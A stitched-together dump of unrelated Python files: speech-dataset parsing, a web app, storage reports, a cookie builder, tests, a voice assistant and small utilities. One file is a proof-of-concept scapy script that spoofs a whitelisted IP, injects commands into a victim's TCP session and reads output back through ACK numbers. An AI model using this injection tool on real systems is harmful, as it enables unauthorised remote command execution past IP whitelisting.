def _parse_transcript(path):
with open(path) as trans_fileobj:
for line in trans_fileobj:
line = line.strip()
if line:
yield line.split(' ', maxsplit=1)
def _parse_directory(root_dir: Path):
for trans_file in root_dir.glob('**/*.trans.txt'):
trans_dir = trans_file.parent
for id_, transcription in _parse_transcript(trans_file):
audio_path = trans_dir / f'{id_}.flac'
yield id_, audio_path, transcription
def _main():
args = _parse_args()
for id_, path, transcription in _parse_directory(args.input_dir):
print(f'{id_}\t{path}\t{transcription}')
if __name__ == '__main__':
_main()
|
#!/usr/bin/env python
# DiabloHorn - QIBA_server_poc
# Bypassing IP whitelisting using quantum inject
import sys
import time
import socket
import collections
from scapy.all import *
"""
iptables -A OUTPUT -p tcp --tcp-flags RST RST -s <ip> -j DROP
"""
STATE_TEMP = []
CMD_DATA = collections.OrderedDict()
def pkt_inspect(pktdata):
#print repr(pktdata)
if pktdata.haslayer(TCP):
tcpdata = pktdata.getlayer(TCP)
#check if syn and ack flags are set
if ((tcpdata.flags >> 1) & 1) and ((tcpdata.flags >> 4) & 1):
if len(STATE_TEMP) == 2:
spkt = IP(src=sys.argv[1],dst=sys.argv[2]) / TCP(dport=STATE_TEMP[0].dport,sport=int(sys.argv[3]),flags='PA',seq=STATE_TEMP[1].ack-1,ack=STATE_TEMP[0].ack-1) / (sys.argv[4] + ':' + 'a'*(100-(len(sys.argv[4])+1)))
print 'Injecting::::::: %s' % repr(spkt)
#print repr(spkt)
send(spkt)
if len(STATE_TEMP) == 1:
if STATE_TEMP[0].ack != tcpdata.ack:
STATE_TEMP.append(tcpdata)
else:
STATE_TEMP.append(tcpdata)
def stopcheck(pktdata):
if pktdata.haslayer(TCP):
tcpdata = pktdata.getlayer(TCP)
if tcpdata.ack == 1 and tcpdata.dport == 31337:
return True
else:
return False
def data_recv(pktdata):
global CMD_DATA
if pktdata.haslayer(TCP):
#print pktdata.getlayer(TCP).ack-1
try:
encdata = '{:02x}'.format(pktdata.getlayer(TCP).ack-1).decode('hex')
if ((ord(encdata[0]) + ord(encdata[1]) + ord(encdata[2])) % 0xff) == ord(encdata[3]):
print "cmdoutput::::::: %s" % encdata[0:3]
CMD_DATA[pktdata.getlayer(TCP).seq] = encdata[0:3]
except TypeError:
pass
except IndexError:
pass
def stopdatarecv(pktdata):
if pktdata.haslayer(TCP):
try:
encdata = '{:02x}'.format(pktdata.getlayer(TCP).ack-1).decode('hex')
#print encdata
if encdata == "STOP":
return True
else:
return False
except TypeError:
pass
except IndexError:
pass
if __name__ == "__main__":
if len(sys.argv) != 5:
print "{} <whitelisted ip> <victim ip> <whitelisted port> <cmd>".format(sys.argv[0])
sys.exit()
sniff(iface="eth0",store=0,prn=pkt_inspect,filter="ip and host {}".format(sys.argv[1]), stop_filter=stopcheck)
sniff(iface="eth0",store=0,prn=data_recv,filter="ip and host {}".format(sys.argv[1]), stop_filter=stopdatarecv)
finalout = ''
for k,v in CMD_DATA.iteritems():
finalout += v
print finalout
|
import time
from uuid import uuid4
from emmett import App, request, response
from emmett.tools import service
app = App(__name__)
app.config.handle_static = False
@app.route(methods=["get"], output="str")
async def html():
"""Return HTML content and a custom header."""
response.headers["x-time"] = f"{time.time()}"
response.content_type = "text/html"
return "<b>HTML OK</b>"
@app.route(methods=["post"], output="str")
async def upload():
"""Load multipart data and store it as a file."""
data = (await request.files).file
if not data:
response.status = 400
return ""
target = f"/tmp/{uuid4().hex}"
await data.save(target)
return target
@app.route("/api/users/<int:user>/records/<int:record>", methods=["put"])
@service.json
async def api(user, record):
"""Check headers for authorization, load JSON/query data and return as JSON."""
if not request.headers.get("authorization"):
response.status = 401
return {}
return {
"params": {"user": user, "record": record},
"query": request.query_params,
"data": await request.body_params
}
|
import csv
from datetime import datetime
from lurge_types.group_report import GroupReport
from directory_config import REPORT_DIR
import logging
import logging.config
from lurge_types.user import UserReport
import typing as T
def createTsvReport(group_reports: T.Dict[str, T.List[GroupReport]], date: str, report_dir: str, logger: logging.Logger) -> None:
"""
Reads the contents of tables in tmp_db and writes them to a .tsv formatted
file.
:param group_reports: volume -> list of GroupReports for all the data we'll put in the report
:param date: Date string of the data to be used (ie, "2019-09-20")
"""
# sets filename to 'report-YYYYMMDD.tsv'
name = "report-{}.tsv".format(date.replace("-", ""))
with open(report_dir+"report-output-files/"+name, "w", newline="") as reportfile:
# start a writer that will format the file as tab-separated
report_writer = csv.writer(reportfile, delimiter="\t",
quoting=csv.QUOTE_NONE)
# write column headers
report_writer.writerow(["Lustre Volume", "PI", "Unix Group",
"Used (bytes)", "Quota (bytes)",
"Last Modified (days)", "Archived Directories", "Is Humgen?"])
logger.info("Adding data to tsv report")
for volume, reports in group_reports.items():
logger.debug("Inserting data for {}...".format(volume))
for report in reports:
data = ["-" if x == None else x for x in report.row]
report_writer.writerow(data)
logger.info("{} created.".format(name))
def create_tsv_user_report(user_reports: T.Dict[int, T.DefaultDict[str, UserReport]], usernames: T.Dict[int, str], user_groups: T.Dict[str, T.List[T.Tuple[str, str]]], logger: logging.Logger) -> None:
logger.info("Writing user report info to TSV file")
with open(f"{REPORT_DIR}user-reports/{datetime.today().strftime('%Y-%m-%d')}.tsv", "w", newline="") as rf:
writer = csv.writer(rf, delimiter="\t", quoting=csv.QUOTE_NONE)
writer.writerow(["username", "data", *user_reports.keys()])
for uid, uname in usernames.items():
for grp_name, gid in user_groups[str(uid)]:
writer.writerow([uname, "size", grp_name, *[
round(user_reports[vol][str(uid)].size[gid]/2 ** 20, 2)
if str(uid) in user_reports[vol] and gid in user_reports[vol][str(uid)].size else 0
for vol in user_reports
]])
writer.writerow([uname, "mtime", grp_name, *[
user_reports[vol][str(uid)]._mtime[gid].strftime(
'%Y-%m-%d')
if str(uid) in user_reports[vol] and gid in user_reports[vol][str(uid)]._mtime else "-"
for vol in user_reports
]])
logger.info("Done writing user report info to TSV file")
|
import arrow
from optional import Optional
from eynnyd.exceptions import InvalidCookieBuildException
from eynnyd.internal.utils.cookies import rfc
from eynnyd.internal.utils.cookies.response_cookie import ResponseCookie
class ResponseCookieBuilder:
"""
Response cookies are generally just key-value pairs but can be more complicated. Using this builder
allows for simple creation of generic or complex cookies with validation.
"""
def __init__(self, name, value):
"""
Constructs an initial ResponseCookieBuilder with common defaults.
:param name: a valid cookie name (via rfc spec)
:param value: a valid cookie value (via rfc spec)
"""
self._name = name
self._value = value
self._expires = Optional.empty()
self._max_age = Optional.empty()
self._domain = Optional.empty()
self._path = Optional.empty()
self._secure = True
self._http_only = True
def set_expires(self, expires):
"""
Sets the cookie to include an expiry date.
:param expires: a date, parsable by python Arrow
:return: This builder to allow for fluent design.
"""
try:
encoded = arrow.get(expires)
except arrow.parser.ParserError as e:
raise InvalidCookieBuildException("Invalid datetime {d}, unable to parse.".format(d=expires), e)
self._expires = Optional.of(encoded)
return self
def set_expires_in_days(self, days_till_expiry):
"""
Sets the cookie to include an expiry date in days from now.
:param days_till_expiry: number of days from now to the expiry time.
:return: This builder to allow for fluent design.
"""
try:
encoded = int(days_till_expiry)
except ValueError as e:
raise InvalidCookieBuildException("Invalid days {d}".format(d=days_till_expiry), e)
self._expires = Optional.of(arrow.utcnow().shift(days=encoded))
return self
def set_max_age(self, max_age):
"""
Sets the max age of the cookie.
:param max_age: an rfc compliant max age
:return: This builder to allow for fluent design.
"""
if not bool(rfc.VALID_RFC_MAX_AGE.fullmatch(str(max_age))):
raise InvalidCookieBuildException("Max Age {m} does not comply with RFC Cookies Specs.".format(m=max_age))
self._max_age = Optional.of(str(max_age))
return self
def set_domain(self, domain):
"""
Sets the limiting domain for the cookie.
:param domain: an rfc compliant domain
:return: This builder to allow for fluent design.
"""
if not bool(rfc.VALID_RFC_DOMAIN.fullmatch(domain)):
raise InvalidCookieBuildException("Domain {d} does not comply with RFC Cookie Specs.".format(d=domain))
self._domain = Optional.of(domain)
return self
def set_path(self, path):
"""
Sets the limiting path for the cookie.
:param path: an rfc compliant path
:return: This builder to allow for fluent design.
"""
if not bool(rfc.VALID_RFC_PATH.fullmatch(path)):
raise InvalidCookieBuildException("Path {p} does not comply with RFC Cookie Specs.".format(p=path))
self._path = Optional.of(path)
return self
def set_secure(self, secure):
"""
Sets whether the cookie is secure or not.
:param secure: a boolean to indicate if we are setting secure or insecure
:return: This builder to allow for fluent design.
"""
self._secure = bool(secure)
return self
def set_http_only(self, http_only):
"""
Sets whether the cookie is http only or not.
:param http_only: a boolean to indicate if we are setting http only or not
:return: This builder to allow for fluent design.
"""
self._http_only = bool(http_only)
return self
def build(self):
"""
Validates the name and value and builds the ResponseCookie object.
:return: a valid ResponseCookie object.
"""
if not bool(rfc.VALID_RFC_COOKIE_NAME.fullmatch(self._name)):
raise InvalidCookieBuildException("Cookie Name {n} does not comply with RFC Cookie Specs.".format(n=self._name))
        if not bool(rfc.VALID_RFC_COOKIE_VALUE.fullmatch(self._value)):
raise InvalidCookieBuildException(
"Cookie Value {v} does not comply with RFC Cookie Specs.".format(v=self._value))
return ResponseCookie(
self._name,
self._value,
self._expires,
self._max_age,
self._domain,
self._path,
self._secure,
self._http_only)
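# Illustrative fluent usage of the builder (the cookie name, value and attribute
# values below are made-up examples, not part of the library):
#
#   cookie = (
#       ResponseCookieBuilder("session", "abc123")
#       .set_expires_in_days(7)
#       .set_path("/")
#       .set_http_only(True)
#       .build()
#   )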
|
# pylint: disable=missing-function-docstring,missing-module-docstring, protected-access
from unittest.mock import AsyncMock, patch
import pytest
from custom_components.hacs.base import HacsBase, HacsRepositories
from custom_components.hacs.enums import HacsDisabledReason
from custom_components.hacs.exceptions import HacsException
from custom_components.hacs.repositories.base import HacsRepository
@pytest.mark.asyncio
async def test_load_hacs_repository_exist(hacs: HacsBase, repository: HacsRepository):
await hacs.tasks.async_load()
task = hacs.tasks.get("load_hacs_repository")
assert task
assert not repository.data.installed
with patch(
"custom_components.hacs.base.HacsRepositories.get_by_full_name", return_value=repository
):
await task.execute_task()
assert repository.data.installed
@pytest.mark.asyncio
async def test_load_hacs_repository_register_failed(
hacs: HacsBase,
caplog: pytest.LogCaptureFixture,
):
await hacs.tasks.async_load()
task = hacs.tasks.get("load_hacs_repository")
assert task
assert not hacs.system.disabled
with patch("custom_components.hacs.base.HacsBase.async_register_repository", AsyncMock()):
await task.execute_task()
assert hacs.system.disabled
assert hacs.system.disabled_reason == HacsDisabledReason.LOAD_HACS
assert "[Unknown error] - Could not load HACS!" in caplog.text
@pytest.mark.asyncio
async def test_load_hacs_repository_register_failed_rate_limit(
hacs: HacsBase,
caplog: pytest.LogCaptureFixture,
):
await hacs.tasks.async_load()
task = hacs.tasks.get("load_hacs_repository")
assert task
assert not hacs.system.disabled
with patch(
"custom_components.hacs.base.HacsBase.async_register_repository",
side_effect=HacsException("ratelimit 403"),
):
await task.execute_task()
assert hacs.system.disabled
assert hacs.system.disabled_reason == HacsDisabledReason.LOAD_HACS
assert "GitHub API is ratelimited, or the token is wrong." in caplog.text
|
#!/usr/bin/env python3
from unittest import TestCase, main
from graph2tensor.model.data import EgoTensorGenerator, build_output_signature
from graph2tensor.model.data import build_sampling_table
from graph2tensor.model.data import SkipGramGenerator4DeepWalk
from graph2tensor.model.data import SkipGramGenerator4Node2Vec
from graph2tensor.model.data import SkipGramGenerator4MetaPath2Vec
from graph2tensor.client import NumpyGraph
import numpy as np
import tensorflow as tf
from test_utils import graph_setup
g = NumpyGraph()
class TestDataset(TestCase):
def test_1_setup(self):
graph_setup(g)
def test_egotensor_generator(self):
ids = np.arange(169343)
labels = np.random.randint(2, size=ids.shape[0], dtype=np.int32)
output_signature = build_output_signature(g.schema, ["(paper) -[cites]- (paper) -[cites]- (paper)"], False)
with EgoTensorGenerator(
graph=g,
meta_paths=["(paper) -[cites]- (paper) -[cites]- (paper)"],
sampler_process_num=1,
converter_process_num=1,
expand_factors=2,
strategies="random",
include_edge=False) as data_gen:
ds = tf.data.Dataset.from_generator(
data_gen,
args=(ids, 1024, False, labels),
output_signature=output_signature
).repeat(2)
for _ in ds:
pass
def test_skipgram_generator_deepwalk(self):
ids = np.arange(169343)
sampling_table = build_sampling_table(g, 'cites')
with SkipGramGenerator4DeepWalk(
graph=g,
edge_type='cites',
vocabulary_size=169343,
negative_samples=4,
sampling_table=sampling_table) as data_gen:
ds = tf.data.Dataset.from_generator(
data_gen,
args=(ids, 1024),
output_signature=((tf.TensorSpec(shape=(None,), dtype=tf.int64), tf.TensorSpec(shape=(None, 4+1), dtype=tf.int64)),
tf.TensorSpec(shape=(None, 4+1), dtype=tf.int32))
).repeat(2)
for _ in ds:
pass
def test_skipgram_generator_node2vec(self):
ids = np.arange(169343)
sampling_table = build_sampling_table(g, 'cites')
with SkipGramGenerator4Node2Vec(
graph=g,
edge_type='cites',
vocabulary_size=169343,
negative_samples=4,
sampling_table=sampling_table) as data_gen:
ds = tf.data.Dataset.from_generator(
data_gen,
args=(ids, 1024),
output_signature=((tf.TensorSpec(shape=(None,), dtype=tf.int64), tf.TensorSpec(shape=(None, 4+1), dtype=tf.int64)),
tf.TensorSpec(shape=(None, 4+1), dtype=tf.int32))
).repeat(2)
for _ in ds:
pass
def test_skipgram_generator_metapath2vec(self):
ids = np.arange(169343)
sampling_table = build_sampling_table(g, 'cites')
with SkipGramGenerator4MetaPath2Vec(
graph=g,
meta_path="(paper) -[cites]- (paper) -[cites]- (paper)",
walk_length=6,
vocabulary_size=169343,
negative_samples=4,
sampling_table=sampling_table) as data_gen:
ds = tf.data.Dataset.from_generator(
data_gen,
args=(ids, 1024),
output_signature=((tf.TensorSpec(shape=(None,), dtype=tf.int64), tf.TensorSpec(shape=(None, 4+1), dtype=tf.int64)),
tf.TensorSpec(shape=(None, 4+1), dtype=tf.int32))
).repeat(2)
for _ in ds:
pass
if __name__ == "__main__":
main()
|
import speech_recognition as sr
import webbrowser
import wikipedia
import requests
import pyttsx3
import urllib
import random
import json
import lxml
import math
import time
import bs4
import os
from nltk.corpus import wordnet as wn
from bs4 import BeautifulSoup as soup
from time import gmtime, strftime
from googlesearch import search
from pygame import mixer
from yr.libyr import Yr
from lxml import etree
os.system('cls' if os.name == 'nt' else 'clear')
engine = pyttsx3.init()
engine.setProperty('rate', 140)
weather = Yr(location_name='South_Africa/KwaZulu-Natal/Durban/') #Fill in your own location. More help in readme.md
r = sr.Recognizer()
r.dynamic_energy_threshold = False
engine.say("I am cashew, a TTS Virtual assistant, clap before talking so I can hear you, say cashew to turn me on")
engine.runAndWait()
microphone_index = 2 #Change this to whatever audio channel your microphone is on.
def onnoise():
mixer.init()
mixer.music.load(r"Robot_blip-Marianne_Gagnon-120342607.ogg") #Change this location to where ever the sound files are located
mixer.music.play()
def offnoise():
mixer.init()
mixer.music.load(r"Robot_blip_2-Marianne_Gagnon-299056732.ogg") #Change this to where ever the sound files are located
mixer.music.play()
try:
while True:
wake = ""
w = sr.Recognizer()
w.dynamic_energy_threshold = True
speech5 = sr.Microphone(device_index=microphone_index)
with speech5 as source:
oaudio = w.listen(source)
w.adjust_for_ambient_noise(source)
try:
wake = w.recognize_google(oaudio, language = 'en-US')
except sr.UnknownValueError:
pass
except sr.WaitTimeoutError:
pass
if "cashew" in wake:
onnoise()
while True:
try:
r = sr.Recognizer()
r.dynamic_energy_threshold = False
speech = sr.Microphone(device_index=microphone_index)
with speech as source:
audio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
recog = r.recognize_google(audio, language = 'en-US')
if "search" in recog:
engine.say("Sure. What do you want me to search?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
engine.say(wikipedia.summary(query))
engine.runAndWait()
break
if "Bing" in recog:
engine.say("Sure. What do you want me to search on bing?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
search = query.replace(" ", "+")
webbrowser.open("https://www.bing.com/search?q=" + search)
break
elif "play" in recog:
engine.say("Sure. What do you want me to play?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
engine.say("Sure. Searching for" + query)
engine.runAndWait()
                            for j in search(query, tld="co.in", num=1, stop=0, pause=2):
if "/watch?v=" in j:
url = j
youtube = etree.HTML(urllib.request.urlopen(url).read())
video_title = youtube.xpath("//span[@id='eow-title']/@title")
title = ''.join(video_title)
if "reaction" in query:
engine.say("Now playing" + title)
engine.runAndWait()
webbrowser.open(url)
break
else:
if "reaction" not in title:
if "REACTION" not in title:
if "Reaction" not in title:
engine.say("Now playing" + title)
engine.runAndWait()
webbrowser.open(url)
break
break
elif "time" in recog:
tim = strftime("%H:%M:%S")
engine.say("The current time is" + tim)
engine.runAndWait()
break
elif "spell" in recog:
engine.say("Sure. What do you want me to spell?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
speeling = list(query)
spelling = str(speeling)
engine.say(query + ", is spelled:" + spelling)
engine.runAndWait()
break
elif "define" in recog:
try:
engine.say("Sure. What word's definition do you want to know?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
word = wn.synsets(query)
defi = word[0].definition()
engine.say("The definition of " + query + " is " + defi)
engine.runAndWait()
break
except IndexError:
engine.say("I could not find a definition for " + defi)
engine.runAndWait()
break
elif "synonym" in recog:
try:
engine.say("Sure. What word do you want a synonym for?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
word = query
synonyms = []
antonyms = []
for syn in wn.synsets(word):
for l in syn.lemmas():
synonyms.append(l.name())
if l.antonyms():
antonyms.append(l.antonyms()[0].name())
if synonyms != []:
engine.say("Some synonyms for " + word + " are " + str(synonyms))
engine.runAndWait()
break
else:
engine.say("I could not find synonyms for " + word)
engine.runAndWait()
break
except:
pass
elif "antonym" in recog:
try:
engine.say("Sure. What word do you want an antonym for?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
word = query
synonyms = []
antonyms = []
for syn in wn.synsets(word):
for l in syn.lemmas():
synonyms.append(l.name())
if l.antonyms():
antonyms.append(l.antonyms()[0].name())
if antonyms != []:
engine.say("Some antonyms for " + word + " are " + str(antonyms))
engine.runAndWait()
break
else:
engine.say("I could not find antonyms for " + word)
engine.runAndWait()
break
except:
pass
elif "where" in recog:
engine.say("Sure. What location do you want to know?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
search = query.replace(" ", "+")
webbrowser.open("https://www.google.co.za/maps/search/" + search)
break
elif "weather" in recog:
now = weather.now(as_json=False)
overtemp = now['temperature']
tempunit = overtemp['@unit']
tempvalue = overtemp['@value']
oversky = now['symbol']
skycon = oversky['@name']
overrain = now['precipitation']
rainvalue = overrain['@value']
overwind = now['windDirection']
overwind2 = now['windSpeed']
winddirection = overwind['@name']
windspeed = overwind2['@mps']
windspeedname = overwind2['@name']
overpressure = now['pressure']
unit = overpressure['@unit']
pressure = overpressure['@value']
engine.say("The weather for the next four hours is as follows:")
engine.runAndWait()
engine.say("The temperature will be " + tempvalue + " degrees " + tempunit + " average.")
engine.runAndWait()
engine.say("With a " + skycon + ".")
engine.runAndWait()
engine.say("It will rain " + rainvalue + " millilitres in the next 4 hours.")
engine.runAndWait()
engine.say("The wind is " + windspeedname + ", blowing at " + windspeed + " meters per second going " + winddirection)
engine.runAndWait()
engine.say("The pressure is " + pressure + " heteropascles.")
engine.runAndWait()
break
elif "joke" in recog:
engine.say("Sure. What do you want the joke to be about? Say random for a random catagory.")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
try:
if "random" in query:
send_url = 'https://sv443.net/jokeapi/v2/joke/Any?blacklistFlags=nsfw,religious,political,racist,sexist'
r = requests.get(send_url)
j = json.loads(r.text)
error = j['error']
if j['type'] == "twopart":
if error == "true":
engine.say(j['message'])
engine.runAndWait()
break
else:
joke1 = j['setup']
joke2 = j['delivery']
engine.say(joke1)
engine.runAndWait()
engine.say(joke2)
engine.runAndWait()
break
else:
if error == "true":
engine.say(j['message'])
engine.runAndWait()
break
else:
joke = j['joke']
engine.say(joke)
engine.runAndWait()
break
else:
send_url = 'https://sv443.net/jokeapi/v2/joke/Any?blacklistFlags=nsfw,religious,political,racist,sexist&type=single&contains='
send_url2 = query
r = requests.get(send_url + send_url2)
j = json.loads(r.text)
error = j['error']
if j['type'] == "twopart":
if error == "true":
engine.say(j['message'])
engine.runAndWait()
break
else:
joke1 = j['setup']
joke2 = j['delivery']
engine.say(joke1)
engine.runAndWait()
engine.say(joke2)
engine.runAndWait()
break
else:
if error == "true":
engine.say(j['message'])
engine.runAndWait()
break
else:
joke = j['joke']
engine.say(joke)
engine.runAndWait()
break
except KeyError:
engine.say("No joke was found with that key word.")
engine.runAndWait()
break
elif "news" in recog:
news_url="https://news.google.com/news/rss"
Client=urllib.request.urlopen(news_url)
xml_page=Client.read()
Client.close()
soup_page=soup(xml_page,"xml")
news_list=soup_page.findAll("item")
for news in news_list:
engine.say("At " + news.pubDate.text + " The following story happened.")
engine.runAndWait()
engine.say(news.title.text)
engine.runAndWait()
engine.say("The source of this news is " + news.source.text)
engine.runAndWait()
break
engine.say("Would you like me to open the story up in your browser?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
if "yes" in query:
link = news.link.text
webbrowser.open(link)
break
else:
continue
break
elif "date" in recog:
tim = strftime("%Y-%m-%d")
engine.say("The current date is" + tim)
engine.runAndWait()
break
elif "off" in recog:
offnoise()
time.sleep(1)
try:
os.remove(r"D:\Users\cayde\Documents\Code\Python\.google-cookie")
exit()
except FileNotFoundError:
exit()
elif "credits" in recog:
engine.say("This was made by Cayden d W on GitHub! Would you like me to open his page?")
engine.runAndWait()
speech2 = sr.Microphone(device_index=microphone_index)
with speech2 as source:
qaudio = r.listen(source, timeout=10.0)
r.adjust_for_ambient_noise(source)
query = r.recognize_google(qaudio, language = 'en-US')
if "yes" in query:
webbrowser.open("https://github.com/CaydendW")
else:
break
break
elif "hello" in recog:
engine.say("Hello to you too!")
engine.runAndWait()
break
elif "hi" in recog:
engine.say("Hello to you too!")
engine.runAndWait()
break
elif "thank you" in recog:
engine.say("You're welcome!")
engine.runAndWait()
break
elif "coin" in recog:
coin = random.randint(1,2)
if coin==1:
engine.say("Heads")
engine.runAndWait()
break
else:
engine.say("Tails")
engine.runAndWait()
break
elif "dice" in recog:
engine.say("You rolled a " + str(random.randint(1,6)))
engine.runAndWait()
break
elif "0 / 0" in recog:
engine.say("I just.. I just what do i .. wha i.. ggfuspm i just. wfubhdnuhlihgvfbihgvybzsxcrdrrsv57helpme ..fgw6e7yesd5rfd68tgtwo7yjuokmc,,ioueuyrepq87ty89")
engine.runAndWait()
exit()
elif "cashew" in recog:
engine.say("Yes!? I'm listening...")
engine.runAndWait()
break
elif "yes" in recog:
engine.say("I'm glad something is going well.")
engine.runAndWait()
break
elif "help" in recog:
webbrowser.open("https://github.com/CaydendW/Cashew/blob/master/help.md")
break
else:
engine.say("Sorry but " + recog + "is not one of my commands. Say help to hear a list of commands.")
engine.runAndWait()
except sr.UnknownValueError:
continue
except sr.RequestError:
continue
except sr.WaitTimeoutError:
offnoise()
time.sleep(1)
try:
os.remove(r"D:\Users\cayde\Documents\Code\Python\.google-cookie")
break
except FileNotFoundError:
break
except KeyboardInterrupt:
offnoise()
time.sleep(1)
try:
os.remove(r".google-cookie")
exit()
except FileNotFoundError:
exit()
except KeyboardInterrupt:
offnoise()
time.sleep(1)
try:
os.remove(r".google-cookie")
exit()
except FileNotFoundError:
exit()
exit()
except Exception:
    engine.say("An unknown exception occurred.")
    engine.runAndWait()
|
from app import runWebsite
runWebsite()
|
# -*- coding: utf-8 -*-
# Add a red number to the top-right corner of your QQ (or Weibo) avatar, similar to the unread-message badge in WeChat.
from PIL import Image, ImageFont, ImageDraw
def add_num(img):
im = Image.open(img)
w, h = im.size
font = ImageFont.truetype('/usr/share/fonts/truetype/ubuntu-font-family/UbuntuMono-R.ttf', 30)
fillcolor = "#ff0000"
draw = ImageDraw.Draw(im)
draw.text((w - 20, 0), '1', font=font, fill=fillcolor)
im.save('r.jpg', 'jpeg')
if __name__ == '__main__':
add_num('1.jpg')
|
"""
MIT License
Copyright (c) 2021 mooncell07
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import annotations
from datetime import date, datetime
from typing import Optional, Mapping, Any
from .partialmanifest import PartialManifest
__all__ = ("Manifest",)
class Manifest(PartialManifest):
"""
A class representing a `Manifest`.
Attributes:
rover_id (Optional[int]): ID of the rover.
rover_name (str): Name of the Rover.
status (Optional[str]): The Rover's mission status.
max_sol (Optional[int]): The most recent Martian sol from which photos exist.
        total_photos (Optional[int]): Number of photos taken by that Rover.
cameras (Mapping[str, str]): Cameras for which there are photos by that Rover on that sol.
""" # noqa: E501
__slots__ = (
"max_sol",
"total_photos",
"cameras",
)
def __init__(self, data: Mapping[Any, Any]) -> None:
super().__init__(data)
self.max_sol: Optional[int] = data.get("max_sol")
self.total_photos: Optional[int] = data.get("total_photos")
self.cameras: Mapping[str, str] = data.get("cameras", {})
def __eq__(self, value: Any) -> bool:
"""
        Checks if two objects are the same using `rover_id`.
Returns:
Result of `obj == obj`.
"""
return isinstance(value, self.__class__) and value.rover_id == self.rover_id
@property
def max_date(self) -> date:
"""
The most recent Earth date from which photos exist.
Returns:
A [datetime.date][] object.
""" # noqa: E501
        return datetime.strptime(self._rover_info["max_date"], "%Y-%m-%d").date()
|
from dependency_injector import containers
from fdap.config.config import Config
from fdap.utils.customlogger import CustomLogger
from fdap.utils.loggeradapter import LoggerAdapter
from typing import Any, Callable
class Application:
_container: containers.DeclarativeContainer
_logger: LoggerAdapter
def __init__(self, container: containers.DeclarativeContainer, callback: Callable = None):
self._logger = CustomLogger.logger('root', 'application')
self._container = container
self._container.config.from_dict(Config.all())
self._container.init_resources()
if callback is not None:
self.bootstrap(callback)
    def get(self, name: str) -> Any:
return self._container.providers.get(name)()
def bootstrap(self, callback: Callable):
try:
callback(self)
except Exception as e:
self._logger.error('Failed Bootstrapping...')
self._logger.error(e)
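# Minimal bootstrapping sketch (the container subclass and provider name below
# are assumptions for illustration, not part of this module):
#
#   class AppContainer(containers.DeclarativeContainer):
#       ...  # declare providers here
#
#   def boot(app: Application):
#       app.get('some_provider')  # resolve a provider by name
#
#   Application(AppContainer(), callback=boot)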
|
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
import random
import numpy as np
import tensorflow as tf
from graphlearn.python.data.feature_spec import FeatureSpec
from graphlearn.python.nn.tf.model.ego_gin import EgoGIN
from graphlearn.python.nn.tf.model.ego_gin import HomoEgoGIN
from graphlearn.python.nn.tf.data.entity import Vertex
from graphlearn.python.nn.tf.data.ego_graph import EgoGraph
from graphlearn.python.nn.tf.layers.ego_gin_layer import EgoGINLayer
from graphlearn.python.nn.tf.layers.ego_gin_layer import EgoGINLayerGroup
class EgoGINTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
pass
def tearDown(self):
pass
def test_homogeneous_graph(self):
spec = FeatureSpec(10)
for i in range(3):
spec.append_dense()
